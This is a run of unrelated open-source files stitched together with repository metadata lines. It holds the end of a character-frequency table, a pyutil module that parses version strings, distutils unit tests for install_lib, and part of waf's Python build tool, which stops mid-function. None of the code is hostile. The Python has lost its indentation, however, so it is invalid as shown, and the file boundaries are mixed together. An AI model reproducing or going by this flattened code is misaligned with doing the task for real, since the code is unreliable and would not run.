7139,7140,7141,7142,7143,4235,7144,4886,7145,7146,7147,4887,7148,7149,7150,4487, # 6384
4047,4488,7151,7152,4888,4048,2989,3888,7153,3665,7154,4049,7155,7156,7157,7158, # 6400
7159,7160,2931,4889,4890,4489,7161,2631,3889,4236,2779,7162,7163,4891,7164,3060, # 6416
7165,1672,4892,7166,4893,4237,3281,4894,7167,7168,3666,7169,3494,7170,7171,4050, # 6432
7172,7173,3104,3360,3420,4490,4051,2684,4052,7174,4053,7175,7176,7177,2253,4054, # 6448
7178,7179,4895,7180,3152,3890,3153,4491,3216,7181,7182,7183,2968,4238,4492,4055, # 6464
7184,2990,7185,2479,7186,7187,4493,7188,7189,7190,7191,7192,4896,7193,4897,2969, # 6480
4494,4898,7194,3495,7195,7196,4899,4495,7197,3105,2731,7198,4900,7199,7200,7201, # 6496
4056,7202,3361,7203,7204,4496,4901,4902,7205,4497,7206,7207,2315,4903,7208,4904, # 6512
7209,4905,2851,7210,7211,3577,7212,3578,4906,7213,4057,3667,4907,7214,4058,2354, # 6528
3891,2376,3217,3773,7215,7216,7217,7218,7219,4498,7220,4908,3282,2685,7221,3496, # 6544
4909,2632,3154,4910,7222,2337,7223,4911,7224,7225,7226,4912,4913,3283,4239,4499, # 6560
7227,2816,7228,7229,7230,7231,7232,7233,7234,4914,4500,4501,7235,7236,7237,2686, # 6576
7238,4915,7239,2897,4502,7240,4503,7241,2516,7242,4504,3362,3218,7243,7244,7245, # 6592
4916,7246,7247,4505,3363,7248,7249,7250,7251,3774,4506,7252,7253,4917,7254,7255, # 6608
3284,2991,4918,4919,3219,3892,4920,3106,3497,4921,7256,7257,7258,4922,7259,4923, # 6624
3364,4507,4508,4059,7260,4240,3498,7261,7262,4924,7263,2992,3893,4060,3220,7264, # 6640
7265,7266,7267,7268,7269,4509,3775,7270,2817,7271,4061,4925,4510,3776,7272,4241, # 6656
4511,3285,7273,7274,3499,7275,7276,7277,4062,4512,4926,7278,3107,3894,7279,7280, # 6672
4927,7281,4513,7282,7283,3668,7284,7285,4242,4514,4243,7286,2058,4515,4928,4929, # 6688
4516,7287,3286,4244,7288,4517,7289,7290,7291,3669,7292,7293,4930,4931,4932,2355, # 6704
4933,7294,2633,4518,7295,4245,7296,7297,4519,7298,7299,4520,4521,4934,7300,4246, # 6720
4522,7301,7302,7303,3579,7304,4247,4935,7305,4936,7306,7307,7308,7309,3777,7310, # 6736
4523,7311,7312,7313,4248,3580,7314,4524,3778,4249,7315,3581,7316,3287,7317,3221, # 6752
7318,4937,7319,7320,7321,7322,7323,7324,4938,4939,7325,4525,7326,7327,7328,4063, # 6768
7329,7330,4940,7331,7332,4941,7333,4526,7334,3500,2780,1741,4942,2026,1742,7335, # 6784
7336,3582,4527,2388,7337,7338,7339,4528,7340,4250,4943,7341,7342,7343,4944,7344, # 6800
7345,7346,3020,7347,4945,7348,7349,7350,7351,3895,7352,3896,4064,3897,7353,7354, # 6816
7355,4251,7356,7357,3898,7358,3779,7359,3780,3288,7360,7361,4529,7362,4946,4530, # 6832
2027,7363,3899,4531,4947,3222,3583,7364,4948,7365,7366,7367,7368,4949,3501,4950, # 6848
3781,4951,4532,7369,2517,4952,4252,4953,3155,7370,4954,4955,4253,2518,4533,7371, # 6864
7372,2712,4254,7373,7374,7375,3670,4956,3671,7376,2389,3502,4065,7377,2338,7378, # 6880
7379,7380,7381,3061,7382,4957,7383,7384,7385,7386,4958,4534,7387,7388,2993,7389, # 6896
3062,7390,4959,7391,7392,7393,4960,3108,4961,7394,4535,7395,4962,3421,4536,7396, # 6912
4963,7397,4964,1857,7398,4965,7399,7400,2176,3584,4966,7401,7402,3422,4537,3900, # 6928
3585,7403,3782,7404,2852,7405,7406,7407,4538,3783,2654,3423,4967,4539,7408,3784, # 6944
3586,2853,4540,4541,7409,3901,7410,3902,7411,7412,3785,3109,2327,3903,7413,7414, # 6960
2970,4066,2932,7415,7416,7417,3904,3672,3424,7418,4542,4543,4544,7419,4968,7420, # 6976
7421,4255,7422,7423,7424,7425,7426,4067,7427,3673,3365,4545,7428,3110,2559,3674, # 6992
7429,7430,3156,7431,7432,3503,7433,3425,4546,7434,3063,2873,7435,3223,4969,4547, # 7008
4548,2898,4256,4068,7436,4069,3587,3786,2933,3787,4257,4970,4971,3788,7437,4972, # 7024
3064,7438,4549,7439,7440,7441,7442,7443,4973,3905,7444,2874,7445,7446,7447,7448, # 7040
3021,7449,4550,3906,3588,4974,7450,7451,3789,3675,7452,2578,7453,4070,7454,7455, # 7056
7456,4258,3676,7457,4975,7458,4976,4259,3790,3504,2634,4977,3677,4551,4260,7459, # 7072
7460,7461,7462,3907,4261,4978,7463,7464,7465,7466,4979,4980,7467,7468,2213,4262, # 7088
7469,7470,7471,3678,4981,7472,2439,7473,4263,3224,3289,7474,3908,2415,4982,7475, # 7104
4264,7476,4983,2655,7477,7478,2732,4552,2854,2875,7479,7480,4265,7481,4553,4984, # 7120
7482,7483,4266,7484,3679,3366,3680,2818,2781,2782,3367,3589,4554,3065,7485,4071, # 7136
2899,7486,7487,3157,2462,4072,4555,4073,4985,4986,3111,4267,2687,3368,4556,4074, # 7152
3791,4268,7488,3909,2783,7489,2656,1962,3158,4557,4987,1963,3159,3160,7490,3112, # 7168
4988,4989,3022,4990,4991,3792,2855,7491,7492,2971,4558,7493,7494,4992,7495,7496, # 7184
7497,7498,4993,7499,3426,4559,4994,7500,3681,4560,4269,4270,3910,7501,4075,4995, # 7200
4271,7502,7503,4076,7504,4996,7505,3225,4997,4272,4077,2819,3023,7506,7507,2733, # 7216
4561,7508,4562,7509,3369,3793,7510,3590,2508,7511,7512,4273,3113,2994,2616,7513, # 7232
7514,7515,7516,7517,7518,2820,3911,4078,2748,7519,7520,4563,4998,7521,7522,7523, # 7248
7524,4999,4274,7525,4564,3682,2239,4079,4565,7526,7527,7528,7529,5000,7530,7531, # 7264
5001,4275,3794,7532,7533,7534,3066,5002,4566,3161,7535,7536,4080,7537,3162,7538, # 7280
7539,4567,7540,7541,7542,7543,7544,7545,5003,7546,4568,7547,7548,7549,7550,7551, # 7296
7552,7553,7554,7555,7556,5004,7557,7558,7559,5005,7560,3795,7561,4569,7562,7563, # 7312
7564,2821,3796,4276,4277,4081,7565,2876,7566,5006,7567,7568,2900,7569,3797,3912, # 7328
7570,7571,7572,4278,7573,7574,7575,5007,7576,7577,5008,7578,7579,4279,2934,7580, # 7344
7581,5009,7582,4570,7583,4280,7584,7585,7586,4571,4572,3913,7587,4573,3505,7588, # 7360
5010,7589,7590,7591,7592,3798,4574,7593,7594,5011,7595,4281,7596,7597,7598,4282, # 7376
5012,7599,7600,5013,3163,7601,5014,7602,3914,7603,7604,2734,4575,4576,4577,7605, # 7392
7606,7607,7608,7609,3506,5015,4578,7610,4082,7611,2822,2901,2579,3683,3024,4579, # 7408
3507,7612,4580,7613,3226,3799,5016,7614,7615,7616,7617,7618,7619,7620,2995,3290, # 7424
7621,4083,7622,5017,7623,7624,7625,7626,7627,4581,3915,7628,3291,7629,5018,7630, # 7440
7631,7632,7633,4084,7634,7635,3427,3800,7636,7637,4582,7638,5019,4583,5020,7639, # 7456
3916,7640,3801,5021,4584,4283,7641,7642,3428,3591,2269,7643,2617,7644,4585,3592, # 7472
7645,4586,2902,7646,7647,3227,5022,7648,4587,7649,4284,7650,7651,7652,4588,2284, # 7488
7653,5023,7654,7655,7656,4589,5024,3802,7657,7658,5025,3508,4590,7659,7660,7661, # 7504
1969,5026,7662,7663,3684,1821,2688,7664,2028,2509,4285,7665,2823,1841,7666,2689, # 7520
3114,7667,3917,4085,2160,5027,5028,2972,7668,5029,7669,7670,7671,3593,4086,7672, # 7536
4591,4087,5030,3803,7673,7674,7675,7676,7677,7678,7679,4286,2366,4592,4593,3067, # 7552
2328,7680,7681,4594,3594,3918,2029,4287,7682,5031,3919,3370,4288,4595,2856,7683, # 7568
3509,7684,7685,5032,5033,7686,7687,3804,2784,7688,7689,7690,7691,3371,7692,7693, # 7584
2877,5034,7694,7695,3920,4289,4088,7696,7697,7698,5035,7699,5036,4290,5037,5038, # 7600
5039,7700,7701,7702,5040,5041,3228,7703,1760,7704,5042,3229,4596,2106,4089,7705, # 7616
4597,2824,5043,2107,3372,7706,4291,4090,5044,7707,4091,7708,5045,3025,3805,4598, # 7632
4292,4293,4294,3373,7709,4599,7710,5046,7711,7712,5047,5048,3806,7713,7714,7715, # 7648
5049,7716,7717,7718,7719,4600,5050,7720,7721,7722,5051,7723,4295,3429,7724,7725, # 7664
7726,7727,3921,7728,3292,5052,4092,7729,7730,7731,7732,7733,7734,7735,5053,5054, # 7680
7736,7737,7738,7739,3922,3685,7740,7741,7742,7743,2635,5055,7744,5056,4601,7745, # 7696
7746,2560,7747,7748,7749,7750,3923,7751,7752,7753,7754,7755,4296,2903,7756,7757, # 7712
7758,7759,7760,3924,7761,5057,4297,7762,7763,5058,4298,7764,4093,7765,7766,5059, # 7728
3925,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,3595,7777,4299,5060,4094, # 7744
7778,3293,5061,7779,7780,4300,7781,7782,4602,7783,3596,7784,7785,3430,2367,7786, # 7760
3164,5062,5063,4301,7787,7788,4095,5064,5065,7789,3374,3115,7790,7791,7792,7793, # 7776
7794,7795,7796,3597,4603,7797,7798,3686,3116,3807,5066,7799,7800,5067,7801,7802, # 7792
4604,4302,5068,4303,4096,7803,7804,3294,7805,7806,5069,4605,2690,7807,3026,7808, # 7808
7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824, # 7824
7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7840
7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,7856, # 7856
7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,7872, # 7872
7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,7888, # 7888
7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,7904, # 7904
7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,7920, # 7920
7921,7922,7923,7924,3926,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935, # 7936
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951, # 7952
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967, # 7968
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983, # 7984
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999, # 8000
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015, # 8016
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031, # 8032
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047, # 8048
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063, # 8064
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079, # 8080
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095, # 8096
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111, # 8112
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127, # 8128
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143, # 8144
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159, # 8160
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175, # 8176
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191, # 8192
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207, # 8208
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223, # 8224
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272
# flake8: noqa
| gpl-3.0 |
Nikoala/CouchPotatoServer | libs/pyutil/version_class.py | 106 | 5299 | # -*- coding: utf-8 -*-
# Copyright (c) 2004-2010 Zooko Wilcox-O'Hearn
# This file is part of pyutil; see README.rst for licensing terms.
"""
extended version number class
"""
# verlib a.k.a. distutils.version by Tarek Ziadé.
from pyutil.verlib import NormalizedVersion
def cmp_version(v1, v2):
return cmp(NormalizedVersion(str(v1)), NormalizedVersion(str(v2)))
# Python Standard Library
import re
# End users see version strings like this:
# "1.0.0"
# ^ ^ ^
# | | |
# | | '- micro version number
# | '- minor version number
# '- major version number
# The first number is "major version number". The second number is the "minor
# version number" -- it gets bumped whenever we make a new release that adds or
# changes functionality. The third number is the "micro version number" -- it
# gets bumped whenever we make a new release that doesn't add or change
# functionality, but just fixes bugs (including performance issues).
# Early-adopter end users see version strings like this:
# "1.0.0a1"
# ^ ^ ^^^
# | | |||
# | | ||'- release number
# | | |'- a=alpha, b=beta, c=release candidate, or none
# | | '- micro version number
# | '- minor version number
# '- major version number
# The optional "a" or "b" stands for "alpha release" or "beta release"
# respectively. The number after "a" or "b" gets bumped every time we
# make a new alpha or beta release. This has the same form and the same
# meaning as version numbers of releases of Python.
# Developers see "full version strings", like this:
# "1.0.0a1-55"
# ^ ^ ^^^ ^
# | | ||| |
# | | ||| '- nano version number
# | | ||'- release number
# | | |'- a=alpha, b=beta, c=release candidate or none
# | | '- micro version number
# | '- minor version number
# '- major version number
# or else like this:
# "1.0.0a1-r22155"
# ^ ^ ^^^ ^
# | | ||| |
# | | ||| '- revision number
# | | ||'- release number
# | | |'- a=alpha, b=beta, c=release candidate or none
# | | '- micro version number
# | '- minor version number
# '- major version number
# The presence of the nano version number means that this is a development
# version. There are no guarantees about compatibility, etc. This version is
# considered to be more recent than the version without this field
# (e.g. "1.0.0a1").
# The nano version number or revision number is meaningful only to developers.
# It gets generated automatically from darcs revision control history by
# "darcsver.py". The nano version number is the count of patches that have been
# applied since the last version number tag was applied. The revision number is
# the count of all patches that have been applied in the history.
VERSION_BASE_RE_STR="(\d+)(\.(\d+)(\.(\d+))?)?((a|b|c)(\d+))?(\.dev(\d+))?"
VERSION_SUFFIX_RE_STR="(-(\d+|r\d+)|.post\d+)?"
VERSION_RE_STR=VERSION_BASE_RE_STR + VERSION_SUFFIX_RE_STR
VERSION_RE=re.compile("^" + VERSION_RE_STR + "$")
class Version(object):
def __init__(self, vstring=None):
self.major = None
self.minor = None
self.micro = None
self.prereleasetag = None
self.prerelease = None
self.nano = None
self.revision = None
if vstring:
try:
self.parse(vstring)
except ValueError, le:
le.args = tuple(le.args + ('vstring:', vstring,))
raise
def parse(self, vstring):
mo = VERSION_RE.search(vstring)
if not mo:
raise ValueError, "Not a valid version string for pyutil.version_class.Version(): %r" % (vstring,)
self.major = int(mo.group(1))
self.minor = mo.group(3) and int(mo.group(3)) or 0
self.micro = mo.group(5) and int(mo.group(5)) or 0
reltag = mo.group(6)
if reltag:
reltagnum = int(mo.group(8))
self.prereleasetag = mo.group(7)
self.prerelease = reltagnum
if mo.group(11):
if mo.group(11)[0] == '-':
if mo.group(12)[0] == 'r':
self.revision = int(mo.group(12)[1:])
else:
self.nano = int(mo.group(12))
else:
assert mo.group(11).startswith('.post'), mo.group(11)
self.revision = int(mo.group(11)[5:])
# XXX in the future, to be compatible with the Python "rational version numbering" scheme, we should move to using .post$REV instead of -r$REV:
# self.fullstr = "%d.%d.%d%s%s" % (self.major, self.minor, self.micro, self.prereleasetag and "%s%d" % (self.prereleasetag, self.prerelease,) or "", self.nano and "-%d" % (self.nano,) or self.revision and ".post%d" % (self.revision,) or "",)
self.fullstr = "%d.%d.%d%s%s" % (self.major, self.minor, self.micro, self.prereleasetag and "%s%d" % (self.prereleasetag, self.prerelease,) or "", self.nano and "-%d" % (self.nano,) or self.revision and "-r%d" % (self.revision,) or "",)
def user_str(self):
return self.full_str()
def full_str(self):
if hasattr(self, 'fullstr'):
return self.fullstr
else:
return 'None'
def __str__(self):
return self.full_str()
def __repr__(self):
return self.__str__()
def __cmp__ (self, other):
return cmp_version(self, other)
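# A quick illustration of the parsing rules above (a sketch only, assuming the
# Python 2 interpreter this module targets; the values follow from VERSION_RE
# and Version.parse()):
#   >>> v = Version("1.0.0a1-55")
#   >>> (v.major, v.minor, v.micro, v.prereleasetag, v.prerelease, v.nano)
#   (1, 0, 0, 'a', 1, 55)
#   >>> str(Version("1.0.0a1-r22155"))
#   '1.0.0a1-r22155'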
| gpl-3.0 |
bgris/ODL_bgris | lib/python3.5/distutils/tests/test_install_lib.py | 11 | 3934 | """Tests for distutils.command.install_data."""
import sys
import os
import importlib.util
import unittest
from distutils.command.install_lib import install_lib
from distutils.extension import Extension
from distutils.tests import support
from distutils.errors import DistutilsOptionError
from test.support import run_unittest
class InstallLibTestCase(support.TempdirManager,
support.LoggingSilencer,
support.EnvironGuard,
unittest.TestCase):
def test_finalize_options(self):
dist = self.create_dist()[1]
cmd = install_lib(dist)
cmd.finalize_options()
self.assertEqual(cmd.compile, 1)
self.assertEqual(cmd.optimize, 0)
# optimize must be 0, 1, or 2
cmd.optimize = 'foo'
self.assertRaises(DistutilsOptionError, cmd.finalize_options)
cmd.optimize = '4'
self.assertRaises(DistutilsOptionError, cmd.finalize_options)
cmd.optimize = '2'
cmd.finalize_options()
self.assertEqual(cmd.optimize, 2)
@unittest.skipIf(sys.dont_write_bytecode, 'byte-compile disabled')
def test_byte_compile(self):
project_dir, dist = self.create_dist()
os.chdir(project_dir)
cmd = install_lib(dist)
cmd.compile = cmd.optimize = 1
f = os.path.join(project_dir, 'foo.py')
self.write_file(f, '# python file')
cmd.byte_compile([f])
pyc_file = importlib.util.cache_from_source('foo.py', optimization='')
pyc_opt_file = importlib.util.cache_from_source('foo.py',
optimization=cmd.optimize)
self.assertTrue(os.path.exists(pyc_file))
self.assertTrue(os.path.exists(pyc_opt_file))
def test_get_outputs(self):
project_dir, dist = self.create_dist()
os.chdir(project_dir)
os.mkdir('spam')
cmd = install_lib(dist)
# setting up a dist environment
cmd.compile = cmd.optimize = 1
cmd.install_dir = self.mkdtemp()
f = os.path.join(project_dir, 'spam', '__init__.py')
self.write_file(f, '# python package')
cmd.distribution.ext_modules = [Extension('foo', ['xxx'])]
cmd.distribution.packages = ['spam']
cmd.distribution.script_name = 'setup.py'
# get_outputs should return 4 elements: spam/__init__.py and .pyc,
# foo.import-tag-abiflags.so / foo.pyd
outputs = cmd.get_outputs()
self.assertEqual(len(outputs), 4, outputs)
def test_get_inputs(self):
project_dir, dist = self.create_dist()
os.chdir(project_dir)
os.mkdir('spam')
cmd = install_lib(dist)
# setting up a dist environment
cmd.compile = cmd.optimize = 1
cmd.install_dir = self.mkdtemp()
f = os.path.join(project_dir, 'spam', '__init__.py')
self.write_file(f, '# python package')
cmd.distribution.ext_modules = [Extension('foo', ['xxx'])]
cmd.distribution.packages = ['spam']
cmd.distribution.script_name = 'setup.py'
# get_inputs should return 2 elements: spam/__init__.py and
# foo.import-tag-abiflags.so / foo.pyd
inputs = cmd.get_inputs()
self.assertEqual(len(inputs), 2, inputs)
def test_dont_write_bytecode(self):
# makes sure byte_compile is not used
dist = self.create_dist()[1]
cmd = install_lib(dist)
cmd.compile = 1
cmd.optimize = 1
old_dont_write_bytecode = sys.dont_write_bytecode
sys.dont_write_bytecode = True
try:
cmd.byte_compile([])
finally:
sys.dont_write_bytecode = old_dont_write_bytecode
self.assertIn('byte-compiling is disabled', self.logs[0][1])
def test_suite():
return unittest.makeSuite(InstallLibTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
| gpl-3.0 |
GNOME/hamster-applet | wafadmin/Tools/python.py | 7 | 11127 | #! /usr/bin/env python
# encoding: utf-8
import os,sys
import TaskGen,Utils,Utils,Runner,Options,Build
from Logs import debug,warn,info
from TaskGen import extension,taskgen,before,after,feature
from Configure import conf
EXT_PY=['.py']
FRAG_2='''
#include "Python.h"
#ifdef __cplusplus
extern "C" {
#endif
void Py_Initialize(void);
void Py_Finalize(void);
#ifdef __cplusplus
}
#endif
int main()
{
Py_Initialize();
Py_Finalize();
return 0;
}
'''
def init_pyext(self):
self.default_install_path='${PYTHONDIR}'
self.uselib=self.to_list(getattr(self,'uselib',''))
if not'PYEXT'in self.uselib:
self.uselib.append('PYEXT')
self.env['MACBUNDLE']=True
def pyext_shlib_ext(self):
self.env['shlib_PATTERN']=self.env['pyext_PATTERN']
def init_pyembed(self):
self.uselib=self.to_list(getattr(self,'uselib',''))
if not'PYEMBED'in self.uselib:
self.uselib.append('PYEMBED')
def process_py(self,node):
if not(self.bld.is_install and self.install_path):
return
def inst_py(ctx):
install_pyfile(self,node)
self.bld.add_post_fun(inst_py)
def install_pyfile(self,node):
path=self.bld.get_install_path(self.install_path+os.sep+node.name,self.env)
self.bld.install_files(self.install_path,[node],self.env,self.chmod,postpone=False)
if self.bld.is_install<0:
info("* removing byte compiled python files")
for x in'co':
try:
os.remove(path+x)
except OSError:
pass
if self.bld.is_install>0:
if self.env['PYC']or self.env['PYO']:
info("* byte compiling %r"%path)
if self.env['PYC']:
program=("""
import sys, py_compile
for pyfile in sys.argv[1:]:
py_compile.compile(pyfile, pyfile + 'c')
""")
argv=[self.env['PYTHON'],'-c',program,path]
ret=Utils.pproc.Popen(argv).wait()
if ret:
raise Utils.WafError('bytecode compilation failed %r'%path)
if self.env['PYO']:
program=("""
import sys, py_compile
for pyfile in sys.argv[1:]:
py_compile.compile(pyfile, pyfile + 'o')
""")
argv=[self.env['PYTHON'],self.env['PYFLAGS_OPT'],'-c',program,path]
ret=Utils.pproc.Popen(argv).wait()
if ret:
raise Utils.WafError('bytecode compilation failed %r'%path)
class py_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def init_py(self):
self.default_install_path='${PYTHONDIR}'
def _get_python_variables(python_exe,variables,imports=['import sys']):
program=list(imports)
program.append('')
for v in variables:
program.append("print(repr(%s))"%v)
os_env=dict(os.environ)
try:
del os_env['MACOSX_DEPLOYMENT_TARGET']
except KeyError:
pass
proc=Utils.pproc.Popen([python_exe,"-c",'\n'.join(program)],stdout=Utils.pproc.PIPE,env=os_env)
output=proc.communicate()[0].split("\n")
if proc.returncode:
if Options.options.verbose:
warn("Python program to extract python configuration variables failed:\n%s"%'\n'.join(["line %03i: %s"%(lineno+1,line)for lineno,line in enumerate(program)]))
raise RuntimeError
return_values=[]
for s in output:
s=s.strip()
if not s:
continue
if s=='None':
return_values.append(None)
elif s[0]=="'"and s[-1]=="'":
return_values.append(s[1:-1])
elif s[0].isdigit():
return_values.append(int(s))
else:break
return return_values
def check_python_headers(conf,mandatory=True):
if not conf.env['CC_NAME']and not conf.env['CXX_NAME']:
conf.fatal('load a compiler first (gcc, g++, ..)')
if not conf.env['PYTHON_VERSION']:
conf.check_python_version()
env=conf.env
python=env['PYTHON']
if not python:
conf.fatal('could not find the python executable')
if Options.platform=='darwin':
conf.check_tool('osx')
try:
v='prefix SO SYSLIBS LDFLAGS SHLIBS LIBDIR LIBPL INCLUDEPY Py_ENABLE_SHARED MACOSX_DEPLOYMENT_TARGET'.split()
(python_prefix,python_SO,python_SYSLIBS,python_LDFLAGS,python_SHLIBS,python_LIBDIR,python_LIBPL,INCLUDEPY,Py_ENABLE_SHARED,python_MACOSX_DEPLOYMENT_TARGET)=_get_python_variables(python,["get_config_var('%s')"%x for x in v],['from distutils.sysconfig import get_config_var'])
except RuntimeError:
conf.fatal("Python development headers not found (-v for details).")
conf.log.write("""Configuration returned from %r:
python_prefix = %r
python_SO = %r
python_SYSLIBS = %r
python_LDFLAGS = %r
python_SHLIBS = %r
python_LIBDIR = %r
python_LIBPL = %r
INCLUDEPY = %r
Py_ENABLE_SHARED = %r
MACOSX_DEPLOYMENT_TARGET = %r
"""%(python,python_prefix,python_SO,python_SYSLIBS,python_LDFLAGS,python_SHLIBS,python_LIBDIR,python_LIBPL,INCLUDEPY,Py_ENABLE_SHARED,python_MACOSX_DEPLOYMENT_TARGET))
if python_MACOSX_DEPLOYMENT_TARGET:
conf.env['MACOSX_DEPLOYMENT_TARGET']=python_MACOSX_DEPLOYMENT_TARGET
conf.environ['MACOSX_DEPLOYMENT_TARGET']=python_MACOSX_DEPLOYMENT_TARGET
env['pyext_PATTERN']='%s'+python_SO
if python_SYSLIBS is not None:
for lib in python_SYSLIBS.split():
if lib.startswith('-l'):
lib=lib[2:]
env.append_value('LIB_PYEMBED',lib)
if python_SHLIBS is not None:
for lib in python_SHLIBS.split():
if lib.startswith('-l'):
env.append_value('LIB_PYEMBED',lib[2:])
else:
env.append_value('LINKFLAGS_PYEMBED',lib)
if Options.platform!='darwin'and python_LDFLAGS:
env.append_value('LINKFLAGS_PYEMBED',python_LDFLAGS.split())
result=False
name='python'+env['PYTHON_VERSION']
if python_LIBDIR is not None:
path=[python_LIBDIR]
conf.log.write("\n\n# Trying LIBDIR: %r\n"%path)
result=conf.check(lib=name,uselib='PYEMBED',libpath=path)
if not result and python_LIBPL is not None:
conf.log.write("\n\n# try again with -L$python_LIBPL (some systems don't install the python library in $prefix/lib)\n")
path=[python_LIBPL]
result=conf.check(lib=name,uselib='PYEMBED',libpath=path)
if not result:
conf.log.write("\n\n# try again with -L$prefix/libs, and pythonXY name rather than pythonX.Y (win32)\n")
path=[os.path.join(python_prefix,"libs")]
name='python'+env['PYTHON_VERSION'].replace('.','')
result=conf.check(lib=name,uselib='PYEMBED',libpath=path)
if result:
env['LIBPATH_PYEMBED']=path
env.append_value('LIB_PYEMBED',name)
else:
conf.log.write("\n\n### LIB NOT FOUND\n")
if(sys.platform=='win32'or sys.platform.startswith('os2')or sys.platform=='darwin'or Py_ENABLE_SHARED):
env['LIBPATH_PYEXT']=env['LIBPATH_PYEMBED']
env['LIB_PYEXT']=env['LIB_PYEMBED']
python_config=conf.find_program('python%s-config'%('.'.join(env['PYTHON_VERSION'].split('.')[:2])),var='PYTHON_CONFIG')
if not python_config:
python_config=conf.find_program('python-config-%s'%('.'.join(env['PYTHON_VERSION'].split('.')[:2])),var='PYTHON_CONFIG')
includes=[]
if python_config:
for incstr in Utils.cmd_output("%s %s --includes"%(python,python_config)).strip().split():
if(incstr.startswith('-I')or incstr.startswith('/I')):
incstr=incstr[2:]
if incstr not in includes:
includes.append(incstr)
conf.log.write("Include path for Python extensions ""(found via python-config --includes): %r\n"%(includes,))
env['CPPPATH_PYEXT']=includes
env['CPPPATH_PYEMBED']=includes
else:
conf.log.write("Include path for Python extensions ""(found via distutils module): %r\n"%(INCLUDEPY,))
env['CPPPATH_PYEXT']=[INCLUDEPY]
env['CPPPATH_PYEMBED']=[INCLUDEPY]
if env['CC_NAME']=='gcc':
env.append_value('CCFLAGS_PYEMBED','-fno-strict-aliasing')
env.append_value('CCFLAGS_PYEXT','-fno-strict-aliasing')
if env['CXX_NAME']=='gcc':
env.append_value('CXXFLAGS_PYEMBED','-fno-strict-aliasing')
env.append_value('CXXFLAGS_PYEXT','-fno-strict-aliasing')
conf.check(define_name='HAVE_PYTHON_H',uselib='PYEMBED',fragment=FRAG_2,errmsg='Could not find the python development headers',mandatory=mandatory)
def check_python_version(conf,minver=None):
assert minver is None or isinstance(minver,tuple)
python=conf.env['PYTHON']
if not python:
conf.fatal('could not find the python executable')
cmd=[python,"-c","import sys\nfor x in sys.version_info: print(str(x))"]
debug('python: Running python command %r'%cmd)
proc=Utils.pproc.Popen(cmd,stdout=Utils.pproc.PIPE)
lines=proc.communicate()[0].split()
assert len(lines)==5,"found %i lines, expected 5: %r"%(len(lines),lines)
pyver_tuple=(int(lines[0]),int(lines[1]),int(lines[2]),lines[3],int(lines[4]))
result=(minver is None)or(pyver_tuple>=minver)
if result:
pyver='.'.join([str(x)for x in pyver_tuple[:2]])
conf.env['PYTHON_VERSION']=pyver
if'PYTHONDIR'in conf.environ:
pydir=conf.environ['PYTHONDIR']
else:
if sys.platform=='win32':
(python_LIBDEST,pydir)=_get_python_variables(python,["get_config_var('LIBDEST')","get_python_lib(standard_lib=0, prefix=%r)"%conf.env['PREFIX']],['from distutils.sysconfig import get_config_var, get_python_lib'])
else:
python_LIBDEST=None
(pydir,)=_get_python_variables(python,["get_python_lib(standard_lib=0, prefix=%r)"%conf.env['PREFIX']],['from distutils.sysconfig import get_config_var, get_python_lib'])
if python_LIBDEST is None:
if conf.env['LIBDIR']:
python_LIBDEST=os.path.join(conf.env['LIBDIR'],"python"+pyver)
else:
python_LIBDEST=os.path.join(conf.env['PREFIX'],"lib","python"+pyver)
if hasattr(conf,'define'):
conf.define('PYTHONDIR',pydir)
conf.env['PYTHONDIR']=pydir
pyver_full='.'.join(map(str,pyver_tuple[:3]))
if minver is None:
conf.check_message_custom('Python version','',pyver_full)
else:
minver_str='.'.join(map(str,minver))
conf.check_message('Python version',">= %s"%minver_str,result,option=pyver_full)
if not result:
conf.fatal('The python version is too old (%r)'%pyver_full)
def check_python_module(conf,module_name):
result=not Utils.pproc.Popen([conf.env['PYTHON'],"-c","import %s"%module_name],stderr=Utils.pproc.PIPE,stdout=Utils.pproc.PIPE).wait()
conf.check_message('Python module',module_name,result)
if not result:
